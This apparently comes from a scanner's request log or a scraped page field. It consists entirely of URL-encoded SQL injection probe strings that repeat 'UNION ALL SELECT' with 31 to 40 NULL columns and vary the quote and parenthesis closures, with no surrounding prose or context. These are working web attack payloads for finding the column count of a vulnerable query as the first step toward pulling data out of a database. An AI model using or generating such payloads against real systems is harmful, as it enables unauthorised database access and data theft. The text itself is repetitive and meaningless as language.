1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 